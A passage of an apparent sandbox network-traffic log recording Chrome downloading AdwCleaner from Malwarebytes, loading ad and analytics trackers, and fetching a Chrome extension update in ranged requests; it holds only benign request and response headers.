                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a7be839b8dc-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://adwcleaner.malwarebytes.com/adwcleaner?channel=release
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      108.156.60.54:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /adwcleaner?channel=release HTTP/2.0
                                                                                                                                                                      host: adwcleaner.malwarebytes.com
                                                                                                                                                                      upgrade-insecure-requests: 1
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                      sec-fetch-site: same-site
                                                                                                                                                                      sec-fetch-mode: navigate
                                                                                                                                                                      sec-fetch-user: ?1
                                                                                                                                                                      sec-fetch-dest: document
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      cookie: _vwo_uuid_v2=D6A380A65C80D9E635C14E26E5B5E452F|4446a6bbb870e56aef9d2aa1c522a1a7
                                                                                                                                                                      cookie: _vwo_ds=3%3Aa_0%2Ct_0%3A0%241673272142%3A4.53417754%3A%3A1_0%3A4_0%2C3_0%3A1
                                                                                                                                                                      cookie: _gcl_au=1.1.93243314.1673272144
                                                                                                                                                                      cookie: gaUserID=7C3A2833-1C13-4638-A652-DD8B0EAEB9ED
                                                                                                                                                                      cookie: __gtm_referrer=https%3A%2F%2Fwww.google.com%2F
                                                                                                                                                                      cookie: original_referral_url=https://www.google.com/
                                                                                                                                                                      cookie: most_recent_referral_url=https://www.google.com/
                                                                                                                                                                      cookie: global_variables.user.type=eyJpc0J1c2luZXNzU21hbGwiOmZhbHNlLCJpc0J1c2luZXNzTGFyZ2UiOmZhbHNlLCJpc0J1c2luZXNzIjpmYWxzZSwiaXNDb25zdW1lciI6dHJ1ZX0%3D
                                                                                                                                                                      cookie: over100=false
                                                                                                                                                                      cookie: _ga_K8KCHE3KSC=GS1.1.1673272144.1.0.1673272144.60.0.0
                                                                                                                                                                      cookie: _ga=GA1.2.1651572003.1673272145
                                                                                                                                                                      cookie: _gid=GA1.2.2009377262.1673272145
                                                                                                                                                                      cookie: OptanonConsent=isIABGlobal=false&datestamp=Mon+Jan+09+2023+13%3A49%3A04+GMT%2B0000+(Greenwich+Mean+Time)&version=6.38.0&hosts=&consentId=ae2f6b16-04f1-4ce3-88a8-1cc6896f7a4f&interactionCount=1&landingPath=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&groups=BG48%3A1%2CC0001%3A1%2CC0003%3A1%2CC0005%3A1%2CC0002%3A1%2CC0004%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/octet-stream
                                                                                                                                                                      content-length: 8791352
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      cache-control: s-maxage=604800
                                                                                                                                                                      content-disposition: attachment;filename="adwcleaner.exe"
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:06 GMT
                                                                                                                                                                      etag: "9b3f3f12aabd7e12c03d1864445aee56-2"
                                                                                                                                                                      expect-ct: enforce; max-age=3600
                                                                                                                                                                      last-modified: Fri, 16 Sep 2022 17:05:32 GMT
                                                                                                                                                                      permissions-policy: interest-cohort=()
                                                                                                                                                                      referrer-policy: strict-origin
                                                                                                                                                                      strict-transport-security: max-age=31560000;includeSubDomains;
                                                                                                                                                                      x-amz-version-id: 1663347932693635
                                                                                                                                                                      x-content-sha256: 1f544da66675521a649e632108f86afb351ad336bd34b7b5c3d290827ebeef54
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-download-options: noopen
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-permitted-cross-domain-policies: none
                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 cf8597852fd073f5b8e6fed4908fe46e.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-P2
                                                                                                                                                                      x-amz-cf-id: tRH33O7H_TOq_FoxS9mQ04qHh17gn_BunvZfnlmCsCQFFIgoZKcqvQ==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://googleads.g.doubleclick.net/pagead/viewthroughconversion/930356311/?random=1673272144838&cv=11&fst=1673272144838&bg=ffffff&guid=ON&async=1&gtm=2oa120&u_w=1280&u_h=720&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&ref=https%3A%2F%2Fwww.google.com%2F&tiba=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&did=dYWJhMj&gdid=dYWJhMj&auid=93243314.1673272144&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      172.217.168.194:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /pagead/viewthroughconversion/930356311/?random=1673272144838&cv=11&fst=1673272144838&bg=ffffff&guid=ON&async=1&gtm=2oa120&u_w=1280&u_h=720&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&ref=https%3A%2F%2Fwww.google.com%2F&tiba=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&did=dYWJhMj&gdid=dYWJhMj&auid=93243314.1673272144&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/2.0
                                                                                                                                                                      host: googleads.g.doubleclick.net
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.linkedin.oribi.io/partner/2594100/domain/malwarebytes.com/token
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.29:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /partner/2594100/domain/malwarebytes.com/token HTTP/2.0
                                                                                                                                                                      host: cdn.linkedin.oribi.io
                                                                                                                                                                      accept: *
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      date: Mon, 09 Jan 2023 11:57:04 GMT
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: public, max-age=3600
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 d143bdfb7cce4cf7ec0bcf9ec13e5914.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: KU9GhP9a9IbelLZ07P4bHbR8ydnq62hLuROvXo-eu1q4ZfioBg1M9A==
                                                                                                                                                                      age: 3121
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://update.googleapis.com/service/update2/json?cup2key=10:1503554099&cup2hreq=2a946d63babb4161d327443b4870ce5844a4c3bba6775d74a2ef2cd2f1f29b4c
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.250.179.163:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /service/update2/json?cup2key=10:1503554099&cup2hreq=2a946d63babb4161d327443b4870ce5844a4c3bba6775d74a2ef2cd2f1f29b4c HTTP/2.0
                                                                                                                                                                      host: update.googleapis.com
                                                                                                                                                                      content-length: 3017
                                                                                                                                                                      x-goog-update-appid: hnimpnehoodheedghdeeijklkeaacbdc,eeigpngbgcognadeebkilcpcaedhellh,llkgjffcdpffmhiakmfcdcblohccpfmo,aemomkdncapdnfajjbbcbdebjljbpmpj,cmahhnpholdijhjokonmfdjbfmklppij,giekcmmlnklenlaomppkphknjmnnpneh,khaoiebndkojlmppeemjhbpbandiljpe,ehgidpndbllacpjalkiimkbadgjfnnmc,ihnlcenocehgdaegdmhbidjhnhdchfmm,obedbbhbpmojnkanicioggnmelmoomoc,jamhcnnkihinmdlkakkaopbjbbcngflc,jflookgnkcckhobaglndicnbbgbonegd,gkmgaooipdjhmangpemjhigmamcehddo,ojhpjlocmbogdgmfpkhlaaeamibhnphh,ggkkehgbnfjpeggfpleeakpidbkibbmn,bklopemakmnopmghhmccadeonafabnal,oimompecagnajdejgnnjijobebaeigek,gcmjkmgdlgnkkcocmoeiminaijmmjnii,hfnkpimlhhgieaddgfemjhofmfblmnib
                                                                                                                                                                      x-goog-update-interactivity: bg
                                                                                                                                                                      x-goog-update-updater: chrome-89.0.4389.114
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      IN A
                                                                                                                                                                      34.104.35.123
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      HEAD
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      HEAD /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 6760942
                                                                                                                                                                      x-request-id: f50aba80-3510-4e6c-9cbd-872da05d695e
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44513
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                      coprocessor-response: download-server
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=0-1119
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 1120
                                                                                                                                                                      x-request-id: 3aca1a54-1d7e-41e6-8925-b1f50be47cab
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44513
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 0-1119/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=1120-2811
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 1692
                                                                                                                                                                      x-request-id: 78b0f29c-a6ec-4d9b-9d99-50f2a44e88b7
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44517
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 1120-2811/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=2812-6305
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 3494
                                                                                                                                                                      x-request-id: 69b49f50-1ac3-4c24-900c-895deda4057a
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44518
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 2812-6305/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=6306-13782
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 7477
                                                                                                                                                                      x-request-id: c0165d09-611e-4741-a3b8-d243d8364d1a
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44519
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 6306-13782/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=13783-30906
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 17124
                                                                                                                                                                      x-request-id: fd6149fd-6454-4a45-be4e-d545122facfc
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44522
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 13783-30906/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                      coprocessor-response: download-server
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=30907-62823
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 31917
                                                                                                                                                                      x-request-id: 3f0434f2-55ac-47f2-805d-202edbf11261
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44523
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 30907-62823/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                      coprocessor-response: download-server
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=62824-129469
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 66646
                                                                                                                                                                      x-request-id: 5611abe4-99cd-44ff-8f91-d388fc9a184b
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44525
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 62824-129469/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                      coprocessor-response: download-server
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=129470-211354
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
